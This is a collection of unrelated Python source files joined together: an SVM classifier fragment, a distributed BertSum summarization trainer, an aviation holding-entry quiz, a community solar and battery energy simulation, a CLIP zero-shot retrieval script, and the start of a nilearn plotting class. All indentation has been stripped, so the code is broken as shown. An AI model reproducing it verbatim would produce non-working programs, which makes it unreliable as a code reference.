# logger.debug("f() py:\n%s" % str(py))
loss_h = 0.0
errors = 0.
for i, yy in enumerate(py):
if y[i] != yy:
# true y does not match predicted y
loss_x = np.maximum(0, 2. + x[i].dot(wT[yy] - wT[y[i]]) + b[yy] - b[y[i]])
if self.penalty_type == 'L2':
loss_x = loss_x ** 2
loss_h += loss_x
errors += 1
if self.penalty_type == 'L2':
loss_h *= 0.5
loss_h = (1. / n) * loss_h
loss_r = 0.5 * np.trace(np.transpose(w).dot(w)) / self.C
if self.penalize_bias:
loss_r += 0.5 * b.dot(b) / self.C
# logger.debug("loss_h: %s" % str(loss_h))
# logger.debug("loss_r: %s" % str(loss_r))
# logger.debug("loss: %s" % str(loss_r + loss_h))
# logger.debug("f(): errors: %f" % errors)
return loss_r + loss_h
def g(self, Wb, x, y):
"""Gradient of loss function
Define m as the predicted class for x:
m = argmax_{k=1..M} x.w_k + b_k
and define margin loss v as:
v = max(0, 2 + x.w_m + b_m - x.w_y + b_y)^p
where p = 1 or 2 depending on penalty_type
for p = 1, gradient of loss is:
d_loss_k = w_k / C
+ 1[k == m] * 1[m != y] * 1[v > 0] * ( 1) * x
+ 1[k == y] * 1[m != y] * 1[v > 0] * (-1) * x
Args:
Wb: np.array(size=(M x (d+1),))
Where M is the number of classes, d is the data dimension,
includes one bias for each class. The weight vectors for all
classes are concatenated one after the other to form a 1d array.
"""
n = x.shape[0]
d = x.shape[1]
M = len(Wb) / (d+1) # The d plus one for bias term
Wb_ = np.reshape(Wb, (M, d+1), order='C')
wT = Wb_[:, 0:d]
b = Wb_[:, d]
w = np.transpose(wT) # weights are column vectors
pv = x.dot(w) + b
py = np.argmax(pv, axis=1) # predicted y
# logger.debug("pv:\n%s" % str(pv))
# logger.debug("g() py:\n%s" % str(py))
# get all incorrect predictions
dlossW = np.zeros(shape=w.shape, dtype=w.dtype)
dlossb = np.zeros(len(b), dtype=b.dtype)
for i, m in enumerate(py):
yi = y[i]
if yi != m: # true != predicted
vx = x[i].dot(wT[m] - wT[yi])
v = np.maximum(0, 2. + vx + b[m] - b[yi])
if v > 0:
if self.penalty_type == 'L2':
dlossW[:, m] += v * x[i]
dlossW[:, yi] -= v * x[i]
dlossb[ m] += v
dlossb[yi] -= v
else:
dlossW[:, m] += x[i]
dlossW[:, yi] -= x[i]
dlossb[ m] += 1
dlossb[yi] -= 1
dlossW = w / self.C + (1. / n) * dlossW
dlossb = (1. / n) * dlossb
if self.penalize_bias:
dlossb += b / self.C
dlossWb = np.transpose(np.vstack([dlossW, dlossb]))
# logger.debug("dlossWb:\n%s" % str(dlossWb))
return np.ravel(dlossWb, order='C')
def fit(self, x, y):
def wf(w, x, y):
return self.f(w, x, y)
def wg(w, x, y):
return self.g(w, x, y)
self.w_ = None
self.b_ = None
self.set_classes(y)
y_ = np.array([self.cls2index_[v] for v in y])
d = x.shape[1]
M = len(self.cls2index_)
Wb0 = np.reshape(rnd.uniform(-1., 1., (d+1)*M), (d+1, M))
Wb0[d, :] = 0. # bias is initialized to zero
Wb0_ = np.ravel(np.transpose(Wb0), order='C')
Wb_ = sgdRMSProp(Wb0_, x, y_, wf, wg, learning_rate=0.001, max_epochs=15000)
Wb = np.transpose(np.reshape(Wb_, (M, d+1), order='C'))
self.w_ = Wb[0:d]
self.b_ = Wb[d]
self.w_names = []
for i in self.index2cls_.keys():
self.w_names.append("class %s" % str(self.index2cls_[i]))
# loss = self.f(Wb_, x, y_)
# logger.debug("Final loss: %f" % loss)
return self.w_, self.b_
def predict(self, x):
des = self.decision_function(x)
# logger.debug("decision_function:\n%s" % str(des))
pred_y = np.argmax(des, axis=1)
y = np.array([self.index2cls_[k] for k in pred_y])
return y
class PairwiseLinearSVMClassifier(Classifier):
def __init__(self, C):
Classifier.__init__(self, C)
self.svms = None
def fit(self, x, y):
self.set_classes(y)
d = x.shape[1]
M = len(self.index2cls_)
pairs = int((M*(M-1))/2)
# logger.debug("M: %d" % M)
self.svms = []
self.w_ = np.zeros(shape=(d, pairs), dtype=float)
self.b_ = np.zeros(pairs, dtype=float)
self.w_names = []
cls = list(self.cls2index_.keys())
pi = 0
for i in range(len(cls)-1):
k1 = cls[i]
for j in range(i+1, len(cls)):
k2 = cls[j]
self.w_names.append("%s vs %s" % (str(k1), str(k2)))
idxs = np.array([l for l, yy in enumerate(y) if yy == k1 or yy == k2])
# logger.debug("pairwise between %d and %d (%d)" % (k1, k2, len(idxs)))
svm = BinaryLinearSVMClassifier(C=self.C)
x_ = x[idxs]
y_ = y[idxs]
w, b = svm.fit(x_, y_)
pred_y = svm.predict(x_)
errors = np.sum([1. if p[0] != p[1] else 0. for p in zip(pred_y, y_)])
# logger.debug("errors:%f" % errors)
self.svms.append(svm)
self.w_[:, pi] = w
self.b_[pi] = b
pi += 1
# logger.debug("w_:\n%s" % str(self.w_))
# logger.debug("b_:\n%s" % str(self.b_))
return self.w_, self.b_
def predict(self, x):
n = x.shape[0]
des = self.decision_function(x)
# logger.debug("decision_function:\n%s" % str(des))
des_p = np.maximum(0, np.sign(des)).astype(int)
tmp_cls = np.zeros(shape=(n, len(self.cls2index_)), dtype=int)
for i in range(n):
for j, svm in enumerate(self.svms):
cls = svm.index2cls_[des_p[i, j]] # get predicted class for svm
idx = self.cls2index_[cls] # lookup class index in this classifier
tmp_cls[i, idx] += 1
# logger.debug("tmp_cls:\n%s" % str(tmp_cls))
pred_y = np.argmax(tmp_cls, axis=1)
y = np.array([self.index2cls_[k] for k in pred_y])
return y
|
<reponame>Anita1017/nlp-recipes
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
import argparse
import os
import sys
import time
import torch
import torch.distributed as dist
import torch.multiprocessing as mp
# torch.set_printoptions(threshold=5000)
nlp_path = os.path.abspath("../../")
if nlp_path not in sys.path:
sys.path.insert(0, nlp_path)
sys.path.insert(0, "./")
from utils_nlp.models.transformers.abstractive_summarization_bertsum import (
BertSumAbs,
BertSumAbsProcessor,
validate,
)
from utils_nlp.dataset.cnndm import CNNDMSummarizationDataset
os.environ["NCCL_IB_DISABLE"] = "0"
# os.environ["NCCL_DEBUG"] = "INFO"
os.environ["NCCL_DEBUG_SUBSYS"] = "ALL"
# os.environ["MASTER_PORT"] = "29952"
# os.environ["MASTER_ADDR"] = "192.168.3.11"
# os.environ['NCCL_SOCKET_IFNAME'] = 'lo'
parser = argparse.ArgumentParser()
parser.add_argument(
"--rank", type=int, default=0, help="The rank of the current node in the cluster"
)
parser.add_argument(
"--dist_url",
type=str,
default="tcp://127.0.0.1:29507",
help="URL specifying how to initialize the process groupi.",
)
parser.add_argument(
"--node_count", type=int, default=1, help="Number of nodes in the cluster."
)
parser.add_argument(
"--cache_dir",
type=str,
default="./abstemp",
help="Directory to cache the tokenizer.",
)
parser.add_argument(
"--data_dir",
type=str,
default="./abstemp",
help="Directory to download the preprocessed data.",
)
parser.add_argument(
"--output_dir",
type=str,
default="./abstemp",
help="Directory to save the output model and prediction results.",
)
parser.add_argument(
"--quick_run",
type=str.lower,
default="false",
choices=["true", "false"],
help="Whether to have a quick run",
)
parser.add_argument(
"--model_name",
type=str,
default="bert-base-uncased",
help='Transformer model used in the summarization model, only \
"bert-uncased" is supported so far.',
)
parser.add_argument(
"--lr_bert", type=float, default=2e-3, help="Learning rate for the BERT encoder."
)
parser.add_argument(
"--lr_dec", type=float, default=2e-1, help="Learning rate for the decoder."
)
parser.add_argument(
"--batch_size",
type=int,
default=5,
help="batch size in terms of input token numbers in training",
)
parser.add_argument(
"--max_pos_length",
type=int,
default=512,
help="maximum input length in terms of input token numbers in training",
)
parser.add_argument(
"--max_steps",
type=int,
default=5e4,
help="""Maximum number of training steps run in training.
If quick_run is set, it's not used.""",
)
parser.add_argument(
"--warmup_steps_bert",
type=int,
default=2e4,
help="Warm-up number of training steps run in training for the encoder. \
If quick_run is set, it's not used.",
)
parser.add_argument(
"--warmup_steps_dec",
type=int,
default=1e4,
help="Warm-up number of training steps run in training for the decoder. \
If quick_run is set, it's not used.",
)
parser.add_argument(
"--summary_filename",
type=str,
default="generated_summaries.txt",
help="Summary file name generated by prediction for evaluation.",
)
parser.add_argument(
"--model_filename",
type=str,
default="dist_abssum_model.pt",
help="model file name saved for evaluation.",
)
parser.add_argument(
"--checkpoint_filename",
type=str,
default=None,
help="filename of a checkpoint where the trainging resumes from. \
default path is at cache_dir",
)
parser.add_argument(
"--report_every",
type=int,
default=10,
help="number of steps between each loss report",
)
parser.add_argument(
"--save_every",
type=int,
default=500,
help="number of steps between each model save and validation",
)
parser.add_argument(
"--fp16",
type=str.lower,
default="false",
choices=["true", "false"],
help="Whether to use mixed precision training",
)
parser.add_argument(
"--fp16_opt_level",
type=str.upper,
default="O2",
choices=["O0", "O1", "O2", "O3"],
help="optimization level, refer to \
https://nvidia.github.io/apex/amp.html#opt-levels for details ",
)
def main():
args = parser.parse_args()
print("NCCL_IB_DISABLE: {}".format(os.getenv("NCCL_IB_DISABLE")))
print("quick_run is {}".format(args.quick_run))
print("output_dir is {}".format(args.output_dir))
print("data_dir is {}".format(args.data_dir))
print("cache_dir is {}".format(args.cache_dir))
TOP_N = -1
if args.quick_run.lower() == "false":
TOP_N = 10
train_dataset, test_dataset = CNNDMSummarizationDataset(
top_n=TOP_N, local_cache_path=args.data_dir, prepare_extractive=False
)
ngpus_per_node = torch.cuda.device_count()
processor = BertSumAbsProcessor(
cache_dir=args.cache_dir, max_src_len=args.max_pos_length
)
summarizer = BertSumAbs(
processor, cache_dir=args.cache_dir, max_pos_length=args.max_pos_length
)
mp.spawn(
main_worker,
nprocs=ngpus_per_node,
args=(ngpus_per_node, summarizer, train_dataset, test_dataset, args),
)
def main_worker(
local_rank, ngpus_per_node, summarizer, train_dataset, test_dataset, args
):
rank = args.rank * ngpus_per_node + local_rank
world_size = args.node_count * ngpus_per_node
print("world_size is {}".format(world_size))
print("local_rank is {} and rank is {}".format(local_rank, rank))
torch.distributed.init_process_group(
backend="nccl", init_method=args.dist_url, world_size=world_size, rank=rank,
)
# return
## should not load checkpoint from this place, otherwise, huge memory increase
if args.checkpoint_filename:
checkpoint = os.path.join(args.cache_dir, args.checkpoint_filename)
else:
checkpoint = None
# train_sum_dataset, test_sum_dataset = load_processed_cnndm_abs(args.data_dir)
def this_validate(class_obj):
return validate(class_obj, test_dataset)
if rank not in [-1, 0]:
save_every = -1
this_validate = None
else:
save_every = args.save_every
fp16 = args.fp16.lower() == "true"
print("fp16 is {}".format(fp16))
# total number of steps for training
MAX_STEPS = 10
SAVE_EVERY = 10
REPORT_EVERY = 10
# number of steps for warm up
WARMUP_STEPS_BERT = MAX_STEPS
WARMUP_STEPS_DEC = MAX_STEPS
if args.quick_run.lower() == "false":
MAX_STEPS = args.max_steps
WARMUP_STEPS_BERT = args.warmup_steps_bert
WARMUP_STEPS_DEC = args.warmup_steps_dec
SAVE_EVERY = save_every
REPORT_EVERY = args.report_every
print("max steps is {}".format(MAX_STEPS))
print("warmup steps for encoder bert is {}".format(WARMUP_STEPS_BERT))
print("warmup steps for decoder is {}".format(WARMUP_STEPS_DEC))
start = time.time()
# summarizer.model.load_checkpoint(checkpoint['model'])
summarizer.fit(
train_dataset,
world_size=world_size,
num_gpus=None,
local_rank=local_rank,
rank=rank,
batch_size=args.batch_size,
max_steps=MAX_STEPS / world_size,
learning_rate_bert=args.lr_bert,
learning_rate_dec=args.lr_dec,
warmup_steps_bert=WARMUP_STEPS_BERT,
warmup_steps_dec=WARMUP_STEPS_DEC,
save_every=SAVE_EVERY,
report_every=REPORT_EVERY,
validation_function=this_validate,
fp16=fp16,
fp16_opt_level=args.fp16_opt_level,
checkpoint=checkpoint,
)
end = time.time()
print("rank {0}, duration {1:.6f}s".format(rank, end - start))
if local_rank in [0, -1] and args.rank == 0:
TOP_N = -1
if args.quick_run.lower() == "false":
TOP_N = ngpus_per_node
saved_model_path = os.path.join(
args.output_dir, "{}_step{}".format(args.model_filename, MAX_STEPS)
)
summarizer.save_model(MAX_STEPS, saved_model_path)
prediction = summarizer.predict(
test_dataset.shorten(top_n=TOP_N), batch_size=ngpus_per_node, num_gpus=ngpus_per_node
)
print(prediction[0])
def _write_list_to_file(list_items, filename):
with open(filename, "w") as filehandle:
# for cnt, line in enumerate(filehandle):
for item in list_items:
filehandle.write("%s\n" % item)
print("writing generated summaries")
_write_list_to_file(
prediction, os.path.join(args.output_dir, args.summary_filename)
)
# only use the following line when you use your own cluster.
# AML distributed training run cleanup for you.
dist.destroy_process_group()
if __name__ == "__main__":
main()
|
<filename>main.py
import random
from argparse import ArgumentParser
from enum import Enum, auto
class Turns(Enum):
RIGHT = 'right'
LEFT = 'left'
class Entries(Enum):
DIRECT = auto()
PARALLEL = auto()
TEARDROP = auto()
def get_reciprocal(degrees):
if degrees > 180:
return degrees - 180
else:
return degrees + 180
def get_parallel_limits(holding_radial, turn):
if turn == Turns.RIGHT:
if holding_radial < 71:
direct_radial = holding_radial + 290
else:
direct_radial = holding_radial - 70
direct_reciprocal = get_reciprocal(direct_radial)
else:
if holding_radial < 291:
direct_reciprocal = holding_radial + 70
else:
direct_reciprocal = holding_radial - 290
direct_radial = get_reciprocal(direct_reciprocal)
return direct_radial, direct_reciprocal
def is_clockwise_between(radial_a, radial_b, course):
"""Check whether a course falls clockwise between two radials
Edges are always False"""
reciprocal_course = get_reciprocal(course)
if reciprocal_course == radial_a or reciprocal_course == radial_b:
return False
if radial_a < radial_b and reciprocal_course in range(radial_a, radial_b + 1):
return True
elif radial_a > radial_b and (reciprocal_course in range(radial_a, 360 + 1) or reciprocal_course in range(1, radial_b + 1)):
return True
else:
return False
def get_entry(holding_radial, turn, direct_radial, direct_reciprocal, inbound_course):
holding_reciprocal = get_reciprocal(holding_radial)
if inbound_course == direct_radial or inbound_course == direct_reciprocal:
return Entries.DIRECT
elif inbound_course == holding_radial:
return Entries.PARALLEL
elif is_clockwise_between(direct_radial, direct_reciprocal, inbound_course):
return Entries.DIRECT
elif is_clockwise_between(direct_reciprocal, holding_reciprocal, inbound_course):
if turn == Turns.RIGHT:
return Entries.TEARDROP
else:
return Entries.PARALLEL
elif is_clockwise_between(holding_reciprocal, direct_radial, inbound_course):
if turn == Turns.RIGHT:
return Entries.PARALLEL
else:
return Entries.TEARDROP
else:
raise ValueError(f'Unhandled edge case: {holding_radial}, {turn.value}, {direct_radial}, {direct_reciprocal}, {inbound_course}')
def quiz(args):
for x in range(1, args.questions + 1):
print(80 * '-')
print(f'Question {x}')
holding_radial = random.randint(1, 360)
turn = random.choice([t for t in Turns])
direct_radial, direct_reciprocal = get_parallel_limits(holding_radial, turn)
inbound_course = random.randint(1, 360)
correct_answer = get_entry(holding_radial, turn, direct_radial, direct_reciprocal, inbound_course)
answer = None
while answer not in [e.value for e in Entries]:
print(80 * '-')
print(f'Choose entry method for holding on radial {holding_radial} with {turn.value} turn and arriving on course {inbound_course}.')
for entry in Entries:
print(f' {entry.value} {entry.name}')
try:
answer = int(input('Your answer? '))
except ValueError:
print(80 * '=')
print(f'Please enter a value of {[e.value for e in Entries]}')
print(80 * '=')
if answer == correct_answer.value:
print('That is correct')
else:
print(f'That should have been {correct_answer.value}. {correct_answer.name}')
def calc(args):
direct_radial, direct_reciprocal = get_parallel_limits(args.holding_radial, args.turn)
entry = get_entry(args.holding_radial, args.turn, direct_radial, direct_reciprocal, args.inbound)
print(f'Use a {entry.name} entry')
def main():
parser = ArgumentParser()
subparsers = parser.add_subparsers()
quiz_parser = subparsers.add_parser('quiz', help='Quiz mode')
quiz_parser.add_argument('--questions', type=int, default=5, help='How many questions to ask')
quiz_parser.set_defaults(func=quiz)
calc_parser = subparsers.add_parser('calc', help='Calculator mode')
calc_parser.add_argument('--inbound', type=int, required=True, help='Inbound course to the holding point')
calc_parser.add_argument('--holding-radial', type=int, required=True, help='Hold radial as given by ATC or plate')
calc_parser.add_argument('--turn', type=str, default=Turns.RIGHT.value, choices=[t.value for t in Turns], help='Turn direction (defaults to right)')
calc_parser.set_defaults(func=calc)
args = parser.parse_args()
if hasattr(args, 'turn'):
args.turn = Turns[args.turn.upper()]
args.func(args)
if __name__ == '__main__':
main()
|
# Custom modules
from network import Network
from participant import Participant, CSV_Participant
from battery import Battery, Central_Battery
from tariffs import Tariffs
import util
from results import Results
# Required 3rd party libraries
import datetime
import pandas as pd
import numpy as np
import pprint
import csv
import os
def simulate(time_periods, mynetwork, my_tariffs, results, status_callback=None):
if status_callback:
status_callback('Performing Energy Calculations: 0%')
percent_finished = 0
single_step_percent = 100.0 / float(len(time_periods))
for time in time_periods:
if status_callback:
percent_finished += single_step_percent
status_callback('Performing Energy Calculations: '+str(round(percent_finished))+"%")
# print "Energy",time
# Calc each participant in/out kWh
for p in mynetwork.get_participants():
results.set_net_export(time, p.get_id(), p.calc_net_export(time, 30))
# Calc exces solar sharing / sales
net_participant_export = mynetwork.calc_total_participant_export(time, 30)
results.set_net_participant_export(time, net_participant_export)
# Calc central battery in/out kWh
central_battery_export = sum(b.make_export_decision(net_participant_export, time) for b in mynetwork.get_batteries())
# central_battery_export = sum(b.make_export_decision(net_participant_export) for b in mynetwork.get_batteries())
results.set_central_battery_export(time, central_battery_export)
# Calc network in/out kWh
results.set_net_network_export(time, net_participant_export + central_battery_export)
# Run local solar allocation algorithm
# Initialise an empty df with column name net_export
participants_list_sorted = pd.DataFrame(columns=['net_export'])
# Add net export data for participants with load
for p in mynetwork.get_participants():
# Get data point from df_net_export df
net_export = results.get_net_export(time, p.get_id())
# If there is load (i.e. export < 0 ) add to list
if net_export < 0 :
participants_list_sorted.loc[p.get_id(), 'net_export'] = net_export
# Sort list of participants with load
participants_list_sorted = participants_list_sorted.sort_values('net_export')
# Calculate total solar available in this time period
available_batt = max(central_battery_export,0)
available_solar = 0
for participant in mynetwork.get_participants():
net_export = results.get_net_export(time, participant.get_id())
if net_export > 0 :
available_solar += net_export
# If there exist participants with load then allocate solar
if len(participants_list_sorted) != 0 :
# Calculate solar allocation - assume even split between participants with load
num_remaining_participants = len(participants_list_sorted)
solar_allocation = float(available_solar) / float(num_remaining_participants)
battery_allocation = float(available_batt) / float(num_remaining_participants)
# Initialise for use in second if statement
reject_solar = 0
# For each participant with load, find how much of their allocated solar is consumed and calculate the leftover ('reject solar')
for p in participants_list_sorted.index.values :
if solar_allocation > 0:
# Allocating solar
local_solar_import = min(abs(solar_allocation), abs(participants_list_sorted.loc[p, 'net_export']))
results.set_local_solar_import(time, p, local_solar_import)
# Find reject solar
reject_solar = solar_allocation - local_solar_import
# Find new available solar (based on what was used)
available_solar -= local_solar_import
# Decrement the number of remaining participants
num_remaining_participants -= 1
# Calculate the new solar allocation
solar_allocation = float(available_solar) / float(num_remaining_participants) if num_remaining_participants > 0 else 0
# If the sale doesn't happen, then these things should be zero
else :
reject_solar = 0
local_solar_import = 0
# Allocate battery export when there is battery export and all solar has been used by this participant
if battery_allocation > 0 and reject_solar <= 0 :
participant_net_export = participants_list_sorted.loc[p,'net_export']
participant_central_batt_import = min(abs(battery_allocation), abs(participant_net_export) - abs(local_solar_import))
results.set_participant_central_batt_import(time, p, participant_central_batt_import)
available_batt -= participant_central_batt_import
battery_allocation = float(available_batt) / float(num_remaining_participants) if num_remaining_participants > 0 else 0
# Save any solar left over after the allocation process to df_network_energy_flows
results.set_unallocated_local_solar(time, available_solar)
# Run local load allocation algorithm (aka solar sales)
# Initialise an empty df with column name net export
solar_sales_participant_list = pd.DataFrame(columns = ['net_export'])
# Add net export data for participants with generation
for p in mynetwork.get_participants():
# Get data point from df_net_export df
net_export = results.get_net_export(time, p.get_id())
# If there is generation (i.e. export > 0 ) add to list
if net_export > 0 :
solar_sales_participant_list.loc[p.get_id(), 'net_export'] = net_export
# Sort list of participants with load
solar_sales_participant_list = solar_sales_participant_list.sort_values('net_export')
# Calculate total load available in this time period
# TODO - central battery
available_load = 0
available_batt_charging_load = abs(min(central_battery_export,0))
# # NOTE available load is positive
# if net_export < 0 :
# available_load += abs(net_export)
for participant in mynetwork.get_participants():
net_export = results.get_net_export(time, participant.get_id())
# NOTE available load is positive
if net_export < 0 :
available_load += abs(net_export)
# If there exists participant with solar, allocate load
if len(solar_sales_participant_list) != 0 :
num_remaining_participants = len(solar_sales_participant_list)
load_allocation = float(available_load) / float(num_remaining_participants)
batt_charging_allocation = float(available_batt_charging_load) / float(num_remaining_participants)
for p in solar_sales_participant_list.index.values :
if load_allocation > 0:
participant_solar_sale = min(abs(load_allocation), abs(solar_sales_participant_list.loc[p,'net_export']))
results.set_local_solar_sales(time, p, participant_solar_sale)
reject_load = load_allocation - participant_solar_sale
available_load -= participant_solar_sale
num_remaining_participants -= 1
load_allocation = float(available_load) / float(num_remaining_participants) if num_remaining_participants > 0 else 0
# If the sale doesn't happen, then these things should be zero
else :
reject_load = 0
participant_solar_sale = 0
if available_batt_charging_load > 0 and reject_load <= 0 :
participant_solar_sale = min(abs(batt_charging_allocation), abs(solar_sales_participant_list.loc[p,'net_export']) - abs(participant_solar_sale))
results.set_central_batt_solar_sales(time, p, participant_solar_sale)
available_batt_charging_load -= participant_solar_sale
batt_charging_allocation = float(available_batt_charging_load) / float(num_remaining_participants) if num_remaining_participants > 0 else 0
# Grid impacts for each customer. Import from grid and solar export to grid.
for p in mynetwork.get_participants():
# First, solar export to grid
net_export = results.get_net_export(time, p.get_id())
local_solar_sales = results.get_local_solar_sales(time, p.get_id())
central_battery_solar_sales = results.get_central_batt_solar_sales(time, p.get_id())
# Calc and save to df
export_to_grid_solar_sales = max(0,net_export) - max(0,local_solar_sales) - max(0,central_battery_solar_sales)
results.set_export_to_grid_solar_sales(time, p.get_id(), export_to_grid_solar_sales)
# Then, electricity import from grid
local_solar_import = results.get_local_solar_import(time, p.get_id())
participant_central_batt_import = results.get_participant_central_batt_import(time, p.get_id())
# Left over load which requires grid import. Calc and save to df.
external_grid_import = abs(min(net_export,0)) - abs(max(0,local_solar_import)) - abs(max(0,participant_central_batt_import))
results.set_external_grid_elec_import(time, p.get_id(), external_grid_import)
# Save any battery load left over after the allocation process to df_network_energy_flows
results.set_unallocated_central_battery_load(time, available_batt_charging_load)
# For the financial calcs for retailer/NSPs, calculate the gross grid import - i.e. how much did all the participants import during this time interval (only considers import - discards export). Also local solar and central battery import.
results.set_gross_participant_grid_import(time, abs(min(results.get_net_participant_export(time),0)))
results.set_gross_participant_local_solar_import(time, max( sum([results.get_local_solar_import(time, participant.get_id()) for participant in mynetwork.get_participants() ]) ,0))
results.set_gross_participant_central_battery_import(time, max( sum( [results.get_participant_central_batt_import(time, participant.get_id()) for participant in mynetwork.get_participants()] ),0))
|
<filename>baselines/clip/zero_shot.py<gh_stars>1-10
# based on: https://github.com/haltakov/natural-language-image-search
from tqdm import tqdm
import json
from collections import defaultdict
from glob import glob
import os
import numpy as np
import clip
import torch
from PIL import Image
from pathlib import Path
import argparse
def encode_images(photos_batch):
photos = [Image.open(photo_file) for photo_file in photos_batch]
photos_preprocessed = torch.stack([preprocess(photo) for photo in photos]).to(device)
with torch.no_grad():
photos_features = model.encode_image(photos_preprocessed)
photos_features /= photos_features.norm(dim=-1, keepdim=True)
return photos_features.cpu().numpy()
def encode_text(search_query):
with torch.no_grad():
text_encoded = model.encode_text(clip.tokenize(search_query, truncate=True).to(device))
text_encoded /= text_encoded.norm(dim=-1, keepdim=True)
return text_encoded.cpu().numpy()
def find_best_matches(text_features, photo_features):
similarities = (photo_features @ text_features.T).squeeze(1)
best_photo_idx = (-similarities).argsort()
similarities = -similarities
unsorted_sims = np.copy(similarities)
similarities.sort()
return best_photo_idx, similarities, unsorted_sims
parser = argparse.ArgumentParser()
parser.add_argument('--descr_path', type=str, default='../../data/valid_data.json')
parser.add_argument('--imgs_path', type=str, default='/network/scratch/b/benno.krojer/dataset/games')
args = parser.parse_args()
clip_type = 'ViT-B/16'
device = "cuda" if torch.cuda.is_available() else "cpu"
print(f'USING DEVICE: {device}')
model, preprocess = clip.load(clip_type, device=device, jit=False) # Must set jit=False for training
correct = 0
total = 0
vid_correct = 0
vid_total = 0
img_correct = 0
img_total = 0
img_dirs = args.imgs_path
descriptions = json.load(open(args.descr_path, 'r'))
results = defaultdict(dict)
for img_dir, data in tqdm(descriptions.items()):
for img_idx, text in data.items():
img_files = list((Path(img_dirs) / img_dir).glob("*.jpg"))
img_files = sorted(img_files, key=lambda x: int(str(x).split('/')[-1].split('.')[0][3:]))
img_embs = encode_images(img_files)
text_emb = encode_text(text.strip())
ranked_idx, sim, unsorted_sims = find_best_matches(text_emb, img_embs)
ranked_files = [str(img_files[rank]).split('/')[-1][:-4] for rank in ranked_idx]
target = str(img_files[int(img_idx)]).split('/')[-1][:-4]
total += 1
results[img_dir].update({f'raw_preds_{img_idx}': unsorted_sims.tolist(), f'clip_pred_{img_idx}': int(ranked_idx[0]) ,f'correct_{img_idx}': 1 if ranked_files[0] == target else 0})
if ranked_files[0] == target:
correct += 1
if 'open-images' in img_dir:
img_total += 1
if ranked_files[0] == target:
img_correct += 1
else:
vid_total += 1
if ranked_files[0] == target:
vid_correct += 1
print('OVERALL ACC: ' + str(round(correct/total,4)))
print('VIDEO ACC: ' + str(round(vid_correct/vid_total,4)))
print('IMG ACC: ' + str(round(img_correct/img_total,4)))
json.dump(results, open(f'results/zero_clip_test.json', 'w'), indent=2)
|
import numbers
from nilearn._utils.docs import fill_doc
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.colors import Normalize
from matplotlib.patches import FancyArrow
from matplotlib.lines import Line2D
from matplotlib.font_manager import FontProperties
from mpl_toolkits.axes_grid1.anchored_artists import AnchoredSizeBar
from nilearn.image import coord_transform
from nilearn.plotting.glass_brain import plot_brain_schematics
@fill_doc
class BaseAxes(object):
"""An MPL axis-like object that displays a 2D view of 3D volumes.
Parameters
----------
%(ax)s
direction : {'x', 'y', 'z'}
The directions of the view.
coord : :obj:`float`
The coordinate along the direction of the cut.
"""
def __init__(self, ax, direction, coord):
self.ax = ax
self.direction = direction
self.coord = coord
self._object_bounds = list()
self.shape = None
def transform_to_2d(self, data, affine):
raise NotImplementedError("'transform_to_2d' needs to be implemented "
"in derived classes'")
def add_object_bounds(self, bounds):
"""Ensures that axes get rescaled when adding object bounds."""
old_object_bounds = self.get_object_bounds()
self._object_bounds.append(bounds)
new_object_bounds = self.get_object_bounds()
if new_object_bounds != old_object_bounds:
self.ax.axis(self.get_object_bounds())
def draw_2d(self, data_2d, data_bounds, bounding_box,
type='imshow', **kwargs):
"""Draw 2D."""
kwargs['origin'] = 'upper'
if self.direction == 'y':
(xmin, xmax), (_, _), (zmin, zmax) = data_bounds
(xmin_, xmax_), (_, _), (zmin_, zmax_) = bounding_box
elif self.direction in 'xlr':
(_, _), (xmin, xmax), (zmin, zmax) = data_bounds
(_, _), (xmin_, xmax_), (zmin_, zmax_) = bounding_box
elif self.direction == 'z':
(xmin, xmax), (zmin, zmax), (_, _) = data_bounds
(xmin_, xmax_), (zmin_, zmax_), (_, _) = bounding_box
else:
raise ValueError('Invalid value for direction %s' %
self.direction)
ax = self.ax
# Here we need to do a copy to avoid having the image changing as
# we change the data
im = getattr(ax, type)(data_2d.copy(),
extent=(xmin, xmax, zmin, zmax),
**kwargs)
self.add_object_bounds((xmin_, xmax_, zmin_, zmax_))
self.shape = data_2d.T.shape
# The bounds of the object do not take into account a possible
# inversion of the axis. As such, we check that the axis is properly
# inverted when direction is left
if self.direction == 'l' and not (ax.get_xlim()[0] > ax.get_xlim()[1]):
ax.invert_xaxis()
return im
def get_object_bounds(self):
"""Return the bounds of the objects on this axes."""
if len(self._object_bounds) == 0:
# Nothing plotted yet
return -.01, .01, -.01, .01
xmins, xmaxs, ymins, ymaxs = np.array(self._object_bounds).T
xmax = max(xmaxs.max(), xmins.max())
xmin = min(xmins.min(), xmaxs.min())
ymax = max(ymaxs.max(), ymins.max())
ymin = min(ymins.min(), ymaxs.min())
return xmin, xmax, ymin, ymax
def draw_left_right(self, size, bg_color, **kwargs):
"""Draw the annotation "L" for left, and "R" for right.
Parameters
----------
size : :obj:`float`, optional
Size of the text areas.
bg_color : matplotlib color: :obj:`str` or (r, g, b) value
The background color for both text areas.
"""
if self.direction in 'xlr':
return
ax = self.ax
ax.text(.1, .95, 'L',
transform=ax.transAxes,
horizontalalignment='left',
verticalalignment='top',
size=size,
bbox=dict(boxstyle="square,pad=0",
ec=bg_color, fc=bg_color, alpha=1),
**kwargs)
ax.text(.9, .95, 'R',
transform=ax.transAxes,
horizontalalignment='right',
verticalalignment='top',
size=size,
bbox=dict(boxstyle="square,pad=0", ec=bg_color, fc=bg_color),
**kwargs)
def draw_scale_bar(self, bg_color, size=5.0, units='cm',
fontproperties=None, frameon=False, loc=4, pad=.1,
borderpad=.5, sep=5, size_vertical=0, label_top=False,
color='black', fontsize=None, **kwargs):
"""Adds a scale bar annotation to the display.
Parameters
----------
bg_color : matplotlib color: :obj:`str` or (r, g, b) value
The background color of the scale bar annotation.
size : :obj:`float`, optional
Horizontal length of the scale bar, given in `units`.
Default=5.0.
units : :obj:`str`, optional
Physical units of the scale bar (`'cm'` or `'mm'`).
Default='cm'.
fontproperties : :class:`~matplotlib.font_manager.FontProperties`\
or :obj:`dict`, optional
Font properties for the label text.
frameon : :obj:`bool`, optional
Whether the scale bar is plotted with a border. Default=False.
loc : :obj:`int`, optional
Location of this scale bar. Valid location codes are documented
`here <https://matplotlib.org/mpl_toolkits/axes_grid/\
api/anchored_artists_api.html#mpl_toolkits.axes_grid1.\
anchored_artists.AnchoredSizeBar>`__.
Default=4.
pad : :obj:`int` or :obj:`float`, optional
Padding around the label and scale bar, in fraction of the font
size. Default=0.1.
borderpad : :obj:`int` or :obj:`float`, optional
Border padding, in fraction of the font size. Default=0.5.
